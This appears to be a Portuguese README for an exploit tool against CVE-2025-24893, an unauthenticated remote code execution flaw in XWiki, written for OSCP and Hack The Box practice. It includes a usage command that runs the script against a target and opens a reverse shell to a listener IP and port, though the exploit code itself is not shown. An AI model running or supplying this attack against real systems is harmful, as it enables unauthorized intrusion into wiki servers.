
Exploit estilo OSCP do CVE-2025-24893 para Linux XWiki
XWiki Platform é uma plataforma wiki genérica que fornece serviços de runtime para aplicações construídas sobre ela. Devido a uma vulnerabilidade no endpoint SolrSearch, um usuário não autenticado pode obter execução remota arbitrária de código. Esta vulnerabilidade afeta a confidencialidade, a integridade e a disponibilidade de toda a instalação do XWiki.
CVE: CVE-2025-24893
Uma demonstração do exploit é mostrada abaixo:

Para usar este exploit, siga estes passos:
git clone https://github.com/yourusername/CVE-2025-24893.gitcd CVE-2025-24893pip install requests./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
Este exploit demonstra a vulnerabilidade de execução remota de código descrita em CVE-2025-24893 e permite que um usuário não autenticado obtenha um reverse shell em instalações XWiki baseadas em Linux vulneráveis.
Eu desenvolvi originalmente esta ferramenta para uso em ambientes de treinamento, como laboratórios de preparação para OSCP e Hack The Box, onde eu queria uma maneira simples e confiável de reproduzir a vulnerabilidade. Como nenhuma ferramenta existente atendia aos meus requisitos, decidi criar uma.
Embora o CVE-2025-24893 já tenha sido corrigido há muito tempo nas versões suportadas do XWiki, este exploit deve ser usado apenas contra sistemas que você possui ou para os quais possui autorização explícita para testar.
O autor não assume nenhuma responsabilidade por qualquer uso indevido deste software ou por qualquer dano resultante do seu uso.
Esta ferramenta destina-se apenas a fins educacionais e a avaliações de segurança autorizadas.
Use-a apenas contra sistemas que você possui ou para os quais possui autorização explícita para testar. O autor não assume nenhuma responsabilidade por qualquer uso indevido deste software ou por quaisquer danos resultantes do seu uso.
Contribuições são bem-vindas.
Se você encontrar bugs, tiver sugestões de melhorias ou quiser adicionar suporte a payloads, plataformas ou recursos adicionais, sinta-se à vontade para abrir uma issue ou enviar um pull request.
Feedback construtivo, relatórios de testes e contribuições de código são muito apreciados.